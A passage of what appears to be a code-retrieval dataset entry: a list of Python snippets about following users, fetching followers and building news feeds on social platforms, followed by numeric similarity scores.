if check:\n #print(\"IN IFFFFF:::\")\n yes_follow_list.append(user)\n \n else:\n #print(\"IN ELSEEEE:::\")\n not_follow_list.append(user)\n \n else:\n print('Got error %s \\nsleeping for 15 minutes.' % response.text)\n sys.stderr.flush()\n time.sleep(61 * 15)\n \n print(\"YES_LIST:::\",yes_follow_list) \n print(\"NO_LIST:::\",not_follow_list) \n return not_follow_list", "def follow(current_user,user_id):\n if request.method == \"POST\":\n #follee = request.get_json('user_id')\n if User.query.filter_by(userid= user_id):\n follow = Follows(userid =user_id, follower_id =current_user.userid)\n db.session.add(follow)\n db.session.commit()\n return jsonify({'message' :'You are now following'})\n return jsonify({'message' :'User doesnt exist..Try again'})\n return jsonify({'errors' : 'Method Invalid'})", "def getNewsFeed(self, userId: int):\n if userId not in self.followList:\n self.followList[userId] = [userId]\n res = []\n\n for user in self.followList[userId]:\n if self.tweetTimeLine.get(user, [user]):\n res += self.tweetTimeLine.get(user, [])\n res.sort()\n res = res[:10]\n # print(res)\n return [i[1] for i in res]", "def get_followers1(user):\n if user.has_key('followers_list'):\n pass\n else:\n if user.has_key('followers_count'):\n if user['followers_count'] > 4999:\n pages = user['followers_count'] / 5000\n f_list = []\n for page in range(pages):\n try:\n follower_set = api1.GetFollowers(user_id=user['id'], cursor=page, count=5000)\n friends_list = []\n for follower in follower_set:\n twitter_users.update({'id':follower.GetId()},follower.AsDict(),upsert=True)\n friends_list.append(follower.GetId())\n f_list = friends_list + f_list\n time.sleep(60)\n user['followers_list'] = f_list\n twitter_users.update({'id': user['id']}, user)\n print \"\\n\\nGot %s followers out of %s listed\" % (len(f_list), user['followers_count'])\n except Exception, e:\n print str(e)\n time.sleep(60)\n else:\n try:\n follower_set = api1.GetFollowers(user_id=user['id'], count=5000)\n friends_list = []\n for follower in follower_set:\n twitter_users.update({'id':follower.GetId()},follower.AsDict(),upsert=True)\n friends_list.append(follower.GetId())\n user['followers_list'] = friends_list\n twitter_users.update({'id': user['id']}, user)\n print \"\\n\\nGot %s followers out of %s listed\" % (len(friends_list), user['followers_count'])\n except Exception, e:\n print str(e)\n time.sleep(60)", "def followers(self, handles):\n print(handles)\n followers_list = {}\n for handle in handles:\n followers = self.twitter_client.followers_ids(screen_name=handle)\n\n r = []\n for page in self.paginate(followers, 100):\n results = self.twitter_client.lookup_users(user_ids=page)\n for result in results:\n r.append(result.screen_name)\n followers_list[handle] = r\n return followers_list", "def get_followers(self):\n rsp = self.session.get(self.url + \"/followers\")\n soup = self.getSoup(rsp.content)\n followers = soup.find_all('div', class_ = 'zm-person-item')\n if not followers:\n return\n i, follower = 0, None\n for follower in followers:\n i += 1\n yield follower.find('a', recursive = False)['href']\n while not i % Page_Items_Num:\n data = {\n 'offset' : i,\n 'start' : follower['id'].split('-')[-1],\n '_xsrf' : self.session.getCookie()['_xsrf']\n }\n rsp = self.session.post(self.url + \"/followers\", data = data)\n if rsp.json()['r'] == 0:\n followers = self.getSoup(rsp.json()['msg'][1]).find_all('div', class_ = 'zm-person-item')\n for follower in followers:\n i += 1\n yield follower.find('a', recursive = False)['href']\n else:\n 
return", "def followed_by(self):\r\n return relationships.FollowedBy(self)", "def is_authenticated_user_following(self, username=None,id=None):\n if not self.is_authenticated:\n raise PicplzError(\"is_authenticated_user_following requires an authenticated API instance\")\n \n return None", "def fetch_friend_ids(self, user, **kwargs):\n friends = self.fetch_friends(user, **kwargs)\n friend_ids = []\n for friend in friends['data']:\n friend_ids.append(friend['id'])\n return friend_ids", "def get(self, entity, follower_id):\n return jsonify(entity.followers.get_or_404(id=follower_id).to_json())", "def follow(self, followerId, followeeId):\n\n # 把 followeeId append到他的 follow 属性中\n if followerId == followeeId: # 不能自己关注自己\n return\n # 实例化一个user(followerID)\n follower = UserInfo()\n follower.user_id = followerId \n follower.follows.append(followeeId) \n self.user_pool[followerId] = follower", "def is_following(self, user):\n return self.followed.filter(followers.c.followed_id == user.id).count() > 0", "def is_following(self, user):\n return self.followed.filter(followers.c.followed_id == user.id).count() > 0", "def following(self):\n return self.data.get(\"following\")", "def followers(congressDict, twitterAPI):\n most = twitterAPI.get_user(list(congressDict.items())[0][1]) # Choose an arbitrary starting point from the dictionary and assign it their user details.\n least = most\n for name in congressDict:\n tempAPI = twitterAPI.get_user(congressDict[name]) # Get the user details of each congress members' twitter handle.\n numFollowers = tempAPI._json['followers_count']\n if (numFollowers > most._json['followers_count']): # If the follower count is greater than most, replace the user details with current one.\n most = tempAPI\n elif (numFollowers < least._json['followers_count']): # If the follower count is lower than least, replace the user details with the current one.\n least = tempAPI\n return [most._json[\"name\"], least._json[\"name\"]]", "def test_followers_following_list_authorized(self):\n\n # user2 following user1\n # follow = Follows(user_being_followed_id=1, user_following_id=2)\n\n self.u2.following.append(self.u)\n db.session.commit()\n\n with self.client as client:\n\n client.post(\n '/login',\n data = {\n \"username\" : self.u.username,\n \"password\" : \"password\"\n },\n )\n\n response = client.get(\"/users/2/following\")\n html = response.get_data(as_text=True)\n\n self.assertEqual(response.status_code, 200)\n self.assertIn('\"/users/1\"' ,html)\n \n response = client.get(\"/users/1/followers\")\n html = response.get_data(as_text=True)\n\n self.assertEqual(response.status_code, 200)\n self.assertIn('\"/users/2\"' ,html)", "def add_follow(follow_id):\n followed_user = User.query.get_or_404(follow_id)\n if not g.user or g.user.id == follow_id or followed_user.is_blocking(g.user):\n flash(\"Access unauthorized.\", \"danger\")\n return redirect(\"/\")\n\n g.user.following.append(followed_user)\n db.session.commit()\n\n return redirect(f\"/users/{g.user.id}/following\")", "def followUser(following):\n\n cur, user_id, con = initialise(3, True)\n cur.execute(\"INSERT INTO followers (user, following) VALUES ((SELECT username FROM users WHERE id = ?), ?)\", (user_id, following))\n finish(con)", "def get_friends_ids(api, user_id):\n url = \"https://api.twitter.com/1.1/friends/ids.json\"\n rate_status = check_rate_limit(api, url)\n remaining_requests = rate_status[\"remaining\"]\n if not remaining_requests:\n delay = rate_status['reset'] - time.time()\n if delay > 0:\n print \"Sleeping 
{0}...\".format(delay)\n time.sleep(delay) \n rate_status = check_rate_limit(api, url)\n remaining_requests = rate_status[\"remaining\"]\n\n friends_ids = []\n params = {\"user_id\": user_id, \"counter\": 0, \n \"count\": 5000, \"stringify_ids\": True}\n response = api.get(url, params=params)\n friends_ids.extend(response.json().get(\"ids\", []))\n response.close()\n remaining_requests -= 1\n\n while response.json().get('next_cursor'):\n if not remaining_requests:\n delay = rate_status['reset'] - time.time()\n if delay > 0:\n print \"Sleeping {0:,.4} s...\".format(delay)\n time.sleep(delay) \n rate_status = check_rate_limit(api, url)\n remaining_requests = rate_status[\"remaining\"]\n params[\"cursor\"] = response.json().get('next_cursor_str')\n response = api.get(url, params=params)\n friends_ids.extend(response.json().get(\"ids\", []))\n response.close()\n remaining_requests -= 1\n return friends_ids", "def all_followers (twitter_data, username):\n\n # initialize\n followers = []\n\n for key in twitter_data: # go through every username in twitter_data\n if username in twitter_data [key]['following']: # check each 'following'\n followers.append (key)\n\n followers.sort() # sort the list alphabetically for testing purposes\n return followers", "def get_all_followers(self):\n return get_all_(self.get_followers)", "def follows(self):\r\n request = http.Request('GET', '{0}/follows/'.format(self.get_url()))\r\n\r\n return request, parsers.parse_json", "def scrapeFollowingFromAnAccount():\n global api", "def followed_by(self):\n return relationships.FollowedBy(self)", "def is_following(self, user):\n return self.followed.filter_by(\n followed_id=user.id).first() is not None", "def getNewsFeed(self, userId: 'int') -> 'List[int]':\n self.followees[userId].add(userId)\n feeds = heapq.merge(*[iter(self.tweets[idx]) for idx in self.followees[userId]])\n return [idx for _, idx in itertools.islice(feeds, 10)]", "def get(self, request):\n # Retrieve the user from the request if they have been authenticated\n current_user = request.user\n # Get the following & followers username list\n # And the following & followers count for the current user\n user_following_data = get_user_following_data(current_user)\n # Return the follower details for the current user\n return Response(\n {\n \"message\": FOLLOW_USER_MSGS['MY_FOLLOWERS_SUCCESSFUL'],\n \"following\": user_following_data[\"following\"],\n \"followers\": user_following_data[\"followers\"],\n \"followingCount\": user_following_data[\"followingCount\"],\n \"followersCount\": user_following_data[\"followersCount\"]\n },\n status=status.HTTP_200_OK\n )", "def tweets_following_users(username):\n user_profile = query_db('select * from user where username = ?',\n [username], one=True)\n follow_tweets = []\n\n if user_profile is None:\n abort(404)\n\n tuples = query_db('''select message.* from message, follower where\n follower.whom_id = message.author_id and follower.who_id = ?\n order by message.pub_date desc limit ?''', [user_profile['user_id'], PER_PAGE])\n\n for tuple in tuples:\n follow_tweet = {}\n follow_tweet[\"message_id\"] = tuple['message_id']\n follow_tweet[\"author_id\"] = tuple['author_id']\n follow_tweet[\"text\"] = tuple['text']\n follow_tweet[\"pub_date\"] = tuple['pub_date']\n follow_tweets.append(follow_tweet)\n\n return jsonify({'follow_tweets': follow_tweets}), 200" ]
[ "0.8282055", "0.7685639", "0.76842815", "0.76074857", "0.7492455", "0.7339311", "0.7327111", "0.7205236", "0.71110606", "0.7069504", "0.70240045", "0.69244426", "0.68713117", "0.68708545", "0.68651557", "0.6858568", "0.68433887", "0.67436033", "0.6737113", "0.67269635", "0.66934717", "0.66748", "0.66501886", "0.6646064", "0.6639912", "0.6639296", "0.6628967", "0.6618302", "0.66130495", "0.656076", "0.6501636", "0.64866006", "0.6469502", "0.6452966", "0.6428073", "0.64227796", "0.64096993", "0.6408517", "0.6376267", "0.63757163", "0.633501", "0.633186", "0.6290592", "0.6290134", "0.6290134", "0.6290134", "0.6290134", "0.62790376", "0.62758577", "0.6249006", "0.6241869", "0.6221779", "0.62192667", "0.61976063", "0.61959654", "0.61884445", "0.61859244", "0.61859244", "0.61859244", "0.61789304", "0.61752063", "0.6164898", "0.6153356", "0.6152201", "0.6151841", "0.6141754", "0.60949457", "0.60948193", "0.60674095", "0.60618126", "0.605477", "0.6054124", "0.6046872", "0.60451615", "0.60406834", "0.6037563", "0.60216033", "0.6016955", "0.60147595", "0.6014579", "0.60069543", "0.5982111", "0.59767383", "0.5968494", "0.5968494", "0.59439635", "0.594369", "0.59419334", "0.59413403", "0.59384245", "0.59356004", "0.5923313", "0.59183663", "0.5903305", "0.59019613", "0.5891216", "0.5888061", "0.5878933", "0.5877713", "0.58723813" ]
0.7454274
5
Aux function for permutation_t_test (for parallel comp).
def _max_stat(X, X2, perms, dof_scaling):
    n_samples = len(X)
    mus = np.dot(perms, X) / float(n_samples)
    stds = np.sqrt(X2[None, :] - mus * mus) * dof_scaling  # std with splitting
    max_abs = np.max(np.abs(mus) / (stds / sqrt(n_samples)), axis=1)  # t-max
    return max_abs
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def PermutationTest(self):\n # U = union of B and T\n union_sample = np.concatenate((self.x_benchmark, self.x_trial), axis=0)\n n_samples = self.NB + self.NT\n \n # Initialize array of test statistic values\n self.TS_tilde = np.zeros(self.n_perm, dtype=np.float)\n \n count=0\n print(\"Running {:d} Permutations... 0%\".format(self.n_perm))\n \n # loop over different samplings\n for i in range(self.n_perm):\n \n # Print progress\n progress = int(round(((i+1)/self.n_perm)*100,0))\n progress_list = [25, 50, 75, 100]\n if count < len(progress_list) and progress == progress_list[count]:\n count+=1\n print(\"Running {:d} Permutations... {:d}%\".format(self.n_perm, progress))\n \n # Random permutations of U (sampling without replacement)\n x_resampled = shuffle(union_sample)\n # Assign first NB elements to Benchmark\n B_resampled = x_resampled[:self.NB]\n # Assign remaning NT elements to Trial\n T_resampled = x_resampled[self.NB:]\n \n # Compute the test statistic\n self.TS_tilde[i] = self.TestStatistic(B_resampled, T_resampled)", "def permutation_t_test(\n X, n_permutations=10000, tail=0, n_jobs=None, seed=None, verbose=None\n):\n from .cluster_level import _get_1samp_orders\n\n n_samples, n_tests = X.shape\n X2 = np.mean(X**2, axis=0) # precompute moments\n mu0 = np.mean(X, axis=0)\n dof_scaling = sqrt(n_samples / (n_samples - 1.0))\n std0 = np.sqrt(X2 - mu0**2) * dof_scaling # get std with var splitting\n T_obs = np.mean(X, axis=0) / (std0 / sqrt(n_samples))\n rng = check_random_state(seed)\n orders, _, extra = _get_1samp_orders(n_samples, n_permutations, tail, rng)\n perms = 2 * np.array(orders) - 1 # from 0, 1 -> 1, -1\n logger.info(\"Permuting %d times%s...\" % (len(orders), extra))\n parallel, my_max_stat, n_jobs = parallel_func(_max_stat, n_jobs)\n max_abs = np.concatenate(\n parallel(\n my_max_stat(X, X2, p, dof_scaling) for p in np.array_split(perms, n_jobs)\n )\n )\n max_abs = np.concatenate((max_abs, [np.abs(T_obs).max()]))\n H0 = np.sort(max_abs)\n if tail == 0:\n p_values = (H0 >= np.abs(T_obs[:, np.newaxis])).mean(-1)\n elif tail == 1:\n p_values = (H0 >= T_obs[:, np.newaxis]).mean(-1)\n elif tail == -1:\n p_values = (-H0 <= T_obs[:, np.newaxis]).mean(-1)\n return T_obs, p_values, H0", "def permutation_test_trial_wrapper(args):\n # print(\"starting \" + str(mp.current_process()))\n adj_matrix = args[0]\n ass_matrix = args[1]\n size = args[2]\n graph = args[3]\n n_cell_types = args[4]\n # H = permumation_test_trial\n H = permutation_test_trial(adj_matrix, ass_matrix, size, graph, n_cell_types)\n # print(\"ending \" + str(mp.current_process()))\n\n return H", "def test_permutation(self):\r\n # Check over two calls to see if the random state is correctly updated.\r\n random = RandomStreams(utt.fetch_seed())\r\n fn = function([], random.permutation((20,), 10), updates=random.updates())\r\n\r\n fn_val0 = fn()\r\n fn_val1 = fn()\r\n\r\n rng_seed = numpy.random.RandomState(utt.fetch_seed()).randint(2**30)\r\n rng = numpy.random.RandomState(int(rng_seed)) #int() is for 32bit\r\n\r\n # rng.permutation outputs one vector at a time, so we iterate.\r\n numpy_val0 = numpy.asarray([rng.permutation(10) for i in range(20)])\r\n numpy_val1 = numpy.asarray([rng.permutation(10) for i in range(20)])\r\n\r\n assert numpy.all(fn_val0 == numpy_val0)\r\n assert numpy.all(fn_val1 == numpy_val1)", "def post_hoc_perm(conditions, n_shuffles, dataframe, method = scipy.stats.ttest_rel, seed = 1010):\n \n np.random.seed(seed)\n\n pairs = [pair for pair in itertools.combinations(conditions, 2)]\n n_pairs = 
len(pairs)\n\n t = np.floor(n_pairs * 0.25)\n\n obs_cond = {}\n perm_cond = {}\n p_cond = {}\n p_ph = {}\n\n maxT = np.zeros(n_shuffles)\n\n #First loop: Generate permutations\n for n, pair in enumerate(pairs):\n\n if n % t == 0:\n print((n / n_pairs) * 100)\n\n term = pair[0] + '_vs_' + pair[1]\n obs, perm, p = t_perm(dataframe[pair[0]], dataframe[pair[1]], n_shuffles, term)\n obs_cond.update(obs)\n perm_cond.update(perm)\n p_cond.update(p)\n\n\n\n for n in range(0, n_shuffles):\n shuffle = np.array([shuffles[n] for shuffles in perm_cond.values()])\n maxT[n] = shuffle[np.squeeze(np.where(abs(shuffle) == np.max(np.abs(shuffle))))]\n\n p_ph = {cond: sum(abs(maxT) >= abs(obs_cond[cond])) / n_shuffles for cond in obs_cond.keys()}\n \n print('Complete')\n return(obs_cond, perm_cond, maxT, p_ph)", "def test_all_pairs_t_test_few_perms(self):\r\n exp = \"\"\"# The tests of significance were performed using a one-sided (low) Student's two-sample t-test.\r\n# Alternative hypothesis: Group 1 mean < Group 2 mean\r\n# The nonparametric p-values were calculated using 5 Monte Carlo permutations.\r\n# The nonparametric p-values contain the correct number of significant digits.\r\n# Entries marked with \"N/A\" could not be calculated because at least one of the groups\r\n# of distances was empty, both groups each contained only a single distance, or\r\n# the test could not be performed (e.g. no variance in groups with the same mean).\r\nGroup 1\tGroup 2\tt statistic\tParametric p-value\tParametric p-value (Bonferroni-corrected)\tNonparametric p-value\tNonparametric p-value (Bonferroni-corrected)\r\nfoo\tbar\t-6.6\t0.00354023978206\t0.0106207193462\tToo few iters to compute p-value (num_iters=5)\tToo few iters to compute p-value (num_iters=5)\r\nfoo\tbaz\t-9.79795897113\t0.000304092472232\t0.000912277416695\tToo few iters to compute p-value (num_iters=5)\tToo few iters to compute p-value (num_iters=5)\r\nbar\tbaz\t-3.0\t0.0288344428112\t0.0865033284337\tToo few iters to compute p-value (num_iters=5)\tToo few iters to compute p-value (num_iters=5)\r\n\"\"\"\r\n obs = all_pairs_t_test(self.labels2, self.dists2,\r\n num_permutations=5, tail_type='low')\r\n self.assertEqual(self.remove_nums(obs), self.remove_nums(exp))", "def test_1_2(self):\r\n input = vector()\r\n p = imatrix()\r\n out = permute_row_elements(input, p)\r\n permute = function([input, p], out)\r\n\r\n rng = numpy.random.RandomState(utt.fetch_seed())\r\n input_val = rng.uniform(size=(5,)).astype(config.floatX)\r\n p_val = numpy.asarray([rng.permutation(5) for i in range(3)\r\n ], dtype='int32')\r\n out_val = permute(input_val, p_val)\r\n\r\n # Each row of p contains a permutation to apply to the input vector\r\n out_bis = numpy.asarray([input_val[p_row] for p_row in p_val])\r\n assert numpy.all(out_val == out_bis)\r\n\r\n # Verify gradient\r\n def permute_fixed(s_input):\r\n \"\"\"Auxiliary op defined to get rid of gradient wrt p_val\"\"\"\r\n return permute_row_elements(s_input, p_val)\r\n utt.verify_grad(permute_fixed, [input_val])", "def test_2_1(self):\r\n input = matrix()\r\n p = ivector()\r\n out = permute_row_elements(input, p)\r\n permute = function([input, p], out)\r\n\r\n rng = numpy.random.RandomState(utt.fetch_seed())\r\n input_val = rng.uniform(size=(3, 5)).astype(config.floatX)\r\n p_val = rng.permutation(5).astype('int32')\r\n out_val = permute(input_val, p_val)\r\n\r\n # The same permutation should be applied to every row of the input matrix.\r\n out_bis = numpy.asarray([r[p_val] for r in input_val])\r\n assert numpy.all(out_val 
== out_bis)\r\n\r\n # Verify gradient\r\n def permute_fixed(s_input):\r\n \"\"\"Auxiliary op defined to get rid of gradient wrt p_val\"\"\"\r\n return permute_row_elements(s_input, p_val)\r\n utt.verify_grad(permute_fixed, [input_val])", "def apply_permutation(hyper, pol, perm):\n pass", "def test_permutation(perm):\n n_src = len(perm)\n perm_tensor = torch.Tensor(perm)\n source_base = torch.ones(1, n_src, 10)\n sources = torch.arange(n_src).unsqueeze(-1) * source_base\n est_sources = perm_tensor.unsqueeze(-1) * source_base\n\n loss_func = PITLossWrapper(pairwise_mse)\n loss_value, reordered = loss_func(est_sources, sources, return_est=True)\n\n assert loss_value.item() == 0\n assert_allclose(sources, reordered)", "def test_permutation(self):\r\n # Check over two calls to see if the random state is correctly updated.\r\n m = Module()\r\n m.random = RandomStreams(utt.fetch_seed())\r\n m.fn = Method([], m.random.permutation((20,), 10))\r\n\r\n made = m.make()\r\n made.random.initialize()\r\n fn_val0 = made.fn()\r\n fn_val1 = made.fn()\r\n\r\n rng_seed = numpy.random.RandomState(utt.fetch_seed()).randint(2**30)\r\n rng = numpy.random.RandomState(int(rng_seed)) #int() is for 32bit\r\n\r\n # rng.permutation outputs one vector at a time, so we iterate.\r\n numpy_val0 = numpy.asarray([rng.permutation(10) for i in range(20)])\r\n numpy_val1 = numpy.asarray([rng.permutation(10) for i in range(20)])\r\n\r\n assert numpy.all(fn_val0 == numpy_val0)\r\n assert numpy.all(fn_val1 == numpy_val1)", "def manual_perm_test(model: 'Fitted sklearn estimator',\n X: 'Pandas df',\n y: 'Pandas series',\n true_score: float,\n n_permutations: int=10000,\n plot: bool=True,\n clf: bool=False) -> 'p-value, null_counts':\n\n scores = [] # Empty list for null distribution scores\n n_perms = range(1, n_permutations, 1) # Range of values to permute\n for n in tqdm(n_perms, desc='Permutation test'): # tqdm for progress bar\n X_train, X_test, y_train, y_test = train_test_split(\n X, y, stratify=y, test_size=0.90, random_state=n\n )\n model.fit(X_train, y_train)\n y_test_perm = np.random.permutation(y_test) # Permuting class labels\n chance_scores = round(model.score(X=X_test, y=y_test_perm), 4)\n scores.append(chance_scores)\n\n # Converting to a pandas dataframe\n perm_scores_df = pd.DataFrame(data=scores, columns=['null_dist'])\n perm_scores_df['null_dist'] *= 100\n null_counts = (\n perm_scores_df # Counts greater than or equal to our test set score\n .loc[(perm_scores_df['null_dist']) >= true_score]\n .count()\n .iloc[0]\n )\n p_value = (null_counts + 1) / (n_permutations + 1)\n p_value = np.round(p_value, decimals=5)\n\n if plot is True: # Plotting a histogram of permutation scores\n plt.figure(figsize=(10, 10))\n sns.distplot(a=perm_scores_df['null_dist'],\n hist=True,\n label='Permutation scores')\n ylim = plt.ylim()\n if clf is False:\n # True classifier score and p-value\n plt.plot(2 * [true_score],\n ylim,\n '--g',\n linewidth=3,\n label='R2 score %s (pvalue : %s)' %\n (true_score, p_value))\n else:\n plt.plot(2 * [true_score],\n ylim,\n '--g',\n linewidth=3,\n label='Multimodal AUC score: %s (pvalue = %s)' %\n (true_score, p_value))\n n_classes = np.unique(y).size\n chance = 2 * [100. 
/ n_classes]\n plt.plot(chance,\n ylim,\n '--k',\n linewidth=3,\n label='Null model mean AUC score: %s' % 50.00)\n \n plt.ylim(ylim)\n plt.legend(loc='lower center', bbox_to_anchor=(0.5, -0.38))\n plt.tight_layout()\n\n if clf is False:\n plt.xlabel(xlabel='R2 Scores')\n else:\n plt.xlabel(xlabel='AUC Scores')\n plt.title(label='Null Distribution')\n plt.savefig('quadratic_null_dist.png', dpi=300, bbox_inches='tight')\n plt.show()\n\n return p_value, null_counts", "def test_perm(self):\n fun = get_problem('perm', dimension=2)\n self.assertAlmostEqual(fun(np.array([1.0, 0.5])), 0.0)", "def test_permutation_helper(self):\r\n # permutation_helper needs \"ndim_added=1\", because its output\r\n # is one dimension more than its \"shape\" argument (and there's\r\n # no way to determine that automatically).\r\n # Check the working case, over two calls to see if the random\r\n # state is correctly updated.\r\n rf = RandomFunction(permutation_helper, tensor.imatrix, 8,\r\n ndim_added=1)\r\n rng_R = random_state_type()\r\n post_r, out = rf(rng_R, (7,), 8)\r\n\r\n f = compile.function(\r\n [compile.In(rng_R,\r\n value=numpy.random.RandomState(utt.fetch_seed()),\r\n update=post_r, mutable=True)],\r\n [out], accept_inplace=True)\r\n\r\n numpy_rng = numpy.random.RandomState(utt.fetch_seed())\r\n val0 = f()\r\n val1 = f()\r\n # numpy_rng.permutation outputs one vector at a time,\r\n # so we call it iteratively to generate all the samples.\r\n numpy_val0 = numpy.asarray([numpy_rng.permutation(8)\r\n for i in range(7)])\r\n numpy_val1 = numpy.asarray([numpy_rng.permutation(8)\r\n for i in range(7)])\r\n print val0\r\n print numpy_val0\r\n print val1\r\n print numpy_val1\r\n self.assertTrue(numpy.all(val0 == numpy_val0))\r\n self.assertTrue(numpy.all(val1 == numpy_val1))\r\n\r\n # This call lacks \"ndim_added=1\", so ndim_added defaults to 0.\r\n # A ValueError should be raised.\r\n rf0 = RandomFunction(permutation_helper, tensor.imatrix, 8)\r\n post_r0, out0 = rf0(rng_R, (7,), 8)\r\n f0 = compile.function(\r\n [compile.In(rng_R,\r\n value=numpy.random.RandomState(utt.fetch_seed()),\r\n update=post_r0, mutable=True)],\r\n [out0], accept_inplace=True)\r\n self.assertRaises(ValueError, f0)\r\n\r\n # Here, ndim_added is 2 instead of 1. 
A ValueError should be raised.\r\n rf2 = RandomFunction(permutation_helper, tensor.imatrix, 8,\r\n ndim_added=2)\r\n post_r2, out2 = rf2(rng_R, (7,), 8)\r\n f2 = compile.function(\r\n [compile.In(rng_R,\r\n value=numpy.random.RandomState(utt.fetch_seed()),\r\n update=post_r2, mutable=True)],\r\n [out2], accept_inplace=True)\r\n self.assertRaises(ValueError, f2)", "def test_permutations(experiment, verbose=False):\n topics = experiment.topics\n no_topics = len(topics) # The total number of topics used for the given experiment.\n no_permutations = experiment.n # The total number of possible permutations.\n\n if verbose:\n print \"Topics: {0} (total of {1})\".format(topics, no_topics)\n print \"Total permutations: {0}\".format(no_permutations)\n print\n\n for i in range(0, no_permutations):\n rotations = experiment.get_rotations(i)\n\n if verbose:\n print \"Permutation {0} ({1})\".format(i, rotations)\n\n for k in range(0, no_topics):\n rotation_topic = experiment.get_rotation_topic(i, k)\n\n if verbose:\n print \"\\tTopic {0} at permutation list position {1}\".format(rotation_topic, k)\n\n if experiment.get_rotations(i)[k] == experiment.get_rotation_topic(i, k):\n if verbose:\n print \"\\t\\tPASS\"\n else:\n if verbose:\n print \"\\t\\tFAIL\"\n return False\n\n if verbose:\n print \"Permutation check PASSED\"\n\n return True", "def test_all_pairs_t_test_no_perms(self):\r\n exp = \"\"\"# The tests of significance were performed using a two-sided Student's two-sample t-test.\r\n# Alternative hypothesis: Group 1 mean != Group 2 mean\r\n# Entries marked with \"N/A\" could not be calculated because at least one of the groups\r\n# of distances was empty, both groups each contained only a single distance, or\r\n# the test could not be performed (e.g. no variance in groups with the same mean).\r\nGroup 1\tGroup 2\tt statistic\tParametric p-value\tParametric p-value (Bonferroni-corrected)\tNonparametric p-value\tNonparametric p-value (Bonferroni-corrected)\r\nfoo\tbar\t-6.6\t0.00708047956412\t0.0212414386924\tN/A\tN/A\r\nfoo\tbaz\t-9.79795897113\t0.000608184944463\t0.00182455483339\tN/A\tN/A\r\nbar\tbaz\t-3.0\t0.0576688856224\t0.173006656867\tN/A\tN/A\r\n\"\"\"\r\n obs = all_pairs_t_test(self.labels2, self.dists2,\r\n num_permutations=0)\r\n self.assertEqual(self.remove_nums(obs), self.remove_nums(exp))", "def test_T0():", "def test_pairwise(self, test_type='t-test'):\n return pair_tests(self.evaluations, test_type, self.diff_var, self.dof)", "def _perform_pairwise_tests(labels, dists, tail_type, num_permutations):\r\n result = []\r\n\r\n # Convert our notion of tail type into the format expected by\r\n # PyCogent.\r\n if tail_type == 'two-sided':\r\n tail_type = None\r\n\r\n # Compare each pair of distributions, keeping track of the number of actual\r\n # tests that were successfully performed so that we can correct for\r\n # multiple comparisons.\r\n num_tests = 0\r\n for g1_idx, (g1_label, g1_dist) in enumerate(zip(labels[:-1], dists[:-1])):\r\n for g2_label, g2_dist in zip(\r\n labels[(g1_idx + 1):], dists[(g1_idx + 1):]):\r\n if ((len(g1_dist) == 1 and len(g2_dist) == 1) or\r\n (len(g1_dist) < 1 or len(g2_dist) < 1)):\r\n # Not enough data to run the test.\r\n obs_t, param_p_val, nonparam_p_val = nan, nan, nan\r\n else:\r\n obs_t, param_p_val, _, nonparam_p_val = mc_t_two_sample(\r\n g1_dist, g2_dist, tails=tail_type,\r\n permutations=num_permutations)\r\n result.append([g1_label, g2_label, obs_t, param_p_val, None,\r\n nonparam_p_val, None])\r\n if obs_t is not nan:\r\n num_tests += 1\r\n\r\n # 
Correct the p-values for multiple comparisons, now that we know how many\r\n # tests succeeded.\r\n for stat in result:\r\n stat[4] = stat[3] if stat[3] is nan else min(stat[3] * num_tests, 1)\r\n stat[6] = stat[5] if stat[5] is nan else min(stat[5] * num_tests, 1)\r\n return result", "def entropy_permutation_test(ordered_pitch_types, single_pitch_pdf, conditional_joint_probabilities, total_transitions,\n n=1000):\n pitch_types, pitch_probabilities = zip(*single_pitch_pdf.items())\n permutation_entropies = []\n progress = progressbar.ProgressBar()\n\n for test_number in progress(xrange(n)):\n # create the new matrix\n permutation_counts = {}\n for first_pitch_type in ordered_pitch_types:\n permutation_counts[first_pitch_type] = {}\n for second_pitch_type in ordered_pitch_types:\n permutation_counts[first_pitch_type][second_pitch_type] = 0\n\n pitch_permutation = numpy.random.choice(pitch_types, total_transitions, p=pitch_probabilities)\n current_pitch = numpy.random.choice(pitch_types, p=pitch_probabilities)\n for next_pitch in pitch_permutation:\n permutation_counts[current_pitch][next_pitch] += 1\n current_pitch = next_pitch\n\n joint_probabilities, _, _ = joint_probabilities_from_transitions(ordered_pitch_types, permutation_counts)\n permutation_entropies.append(entropy_from_probability_matrix(joint_probabilities))\n\n joint_entropy = entropy_from_probability_matrix(conditional_joint_probabilities)\n # print 'Mean', numpy.mean(permutation_entropies)\n # print 'Standard deviation', numpy.std(permutation_entropies)\n # tdof, tloc, tscale = stats.t.fit(permutation_entropies)\n # print 'DF', tdof, 'Loc (mean)', tloc, 'Scale (SD)', tscale\n # t_score = (joint_entropy - tloc) / tscale\n # print stats.t.cdf(joint_entropy, df=tdof, loc=tloc, scale=tscale)\n\n mean, stddev = stats.norm.fit(permutation_entropies)\n print 'Mean = {mean}\\t StdDev = {stddev}'.format(mean=mean, stddev=stddev)\n z_score = (joint_entropy - mean) / stddev\n p_value = stats.norm.cdf(joint_entropy, mean, stddev)\n print 'The joint entropy has a Z-score of {z_score} which gives a P-value of {p_value}'.format(z_score=z_score,\n p_value=p_value)\n return z_score, p_value", "def test_perform_pairwise_tests_single_comp(self):\r\n # Verified with R's t.test function.\r\n exp = [['foo', 'bar', -6.5999999999999996, 0.0070804795641244006,\r\n 0.0070804795641244006, 0.100000000001, 0.10000000000001]]\r\n np.random.seed(self.value_for_seed)\r\n obs = _perform_pairwise_tests(self.labels1, self.dists1, 'two-sided',\r\n 999)\r\n self.compare_multiple_level_array(obs, exp)", "def test_T3():", "def test_T3():", "def test_permutation(self):\r\n rng_R = random_state_type()\r\n post_r, out = permutation(rng_R, size=(9,), n=6)\r\n print 'OUT NDIM', out.ndim\r\n f = compile.function(\r\n [compile.In(rng_R,\r\n value=numpy.random.RandomState(utt.fetch_seed()),\r\n update=post_r, mutable=True)],\r\n [out], accept_inplace=True)\r\n\r\n numpy_rng = numpy.random.RandomState(utt.fetch_seed())\r\n # Check over two calls to see if the random state is correctly updated.\r\n # numpy_rng.permutation outputs one vector at a time,\r\n # so we call it iteratively to generate all the samples.\r\n val0 = f()\r\n val1 = f()\r\n numpy_val0 = numpy.asarray([numpy_rng.permutation(6)\r\n for i in range(9)])\r\n numpy_val1 = numpy.asarray([numpy_rng.permutation(6)\r\n for i in range(9)])\r\n print val0\r\n print numpy_val0\r\n print val1\r\n print numpy_val1\r\n self.assertTrue(numpy.all(val0 == numpy_val0))\r\n self.assertTrue(numpy.all(val1 == numpy_val1))", 
